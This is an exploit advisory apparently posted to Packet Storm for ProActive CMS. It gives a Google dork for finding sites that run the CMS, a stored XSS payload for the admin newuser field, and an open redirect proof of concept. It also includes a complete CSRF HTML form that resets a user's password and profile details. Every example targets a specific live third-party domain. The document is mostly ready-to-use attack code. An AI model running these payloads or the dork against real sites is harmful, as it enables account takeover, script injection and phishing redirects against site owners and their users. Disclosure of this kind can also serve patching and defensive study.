Lucene search
Rafay BalochPACKETSTORM:119542HistoryJan 15, 2013 - 12:00 a.m.
ProActive CMS XSS / CSRF / Open Redirect
2013-01-1500:00:00
Rafay Baloch
packetstormsecurity.com
24
`# Exploit Title: ProActive CMS Multiple Vulnerabilities
# Google Dork: intext:"Powered by Proactive CMS"
# Exploit Author: Rafay Baloch
# Vendor Homepage: http://www.proactivecms.com
# Tested on: Linux
Stored Cross Site Scripting:
http://professional.inbusiness.com.au/admin.php?action=newuser
Insert Your Payload:
"><img src=x onerror=prompt(0);>
The newuser field does not properly sanitize the input, resulting in a
Stored
XSS.
An Open redirect issue also found:
POC:
http://professional.inbusiness.com.au/admin.php?action=http://rafayhackingarticles.net
Just, replace http://rafayhackingarticles.net with your own domain.
Missing CSRF Tokens:
Most of the forms are missing with CSRF tokens, To be honest one of the
most insecure
cms i have ever seen.
http://professional.inbusiness.com.au/admin.php?action=edituser&id=24
The following POC, could be altered to use it to alter a user's detail.
<html>
<body>
<form action="
http://professional.inbusiness.com.au/admin.php?action=saveuser&id=24"
method="POST">
<input type="hidden" name="groupreadvalue" value="" />
<input type="hidden" name="groupreadallvalue" value="" />
<input type="hidden" name="id" value="24" />
<input type="hidden" name="password1" value="tony123" />
<input type="hidden" name="firstname" value="Tony" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="initials" value="V" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="lastname" value="Badger" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="title" value="" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="dob" value="" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="email"
value="[email protected]" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="telephone" value="+13" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="mobile" value="" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="fax" value="" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="url" value="" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="address" value="" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="suburb" value="" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="postcode" value="" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="state" value="" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="country" value="" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="business_name" value="" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="division" value="" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="position" value="" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="building" value="" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="x" value="30" />
<input type="hidden" name="y" value="10" />
<input type="hidden" name="groupReadList" value=",Sales" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
RHA:
http://rafayhackingarticles.net
http://twitter.com/rafaybaloch
`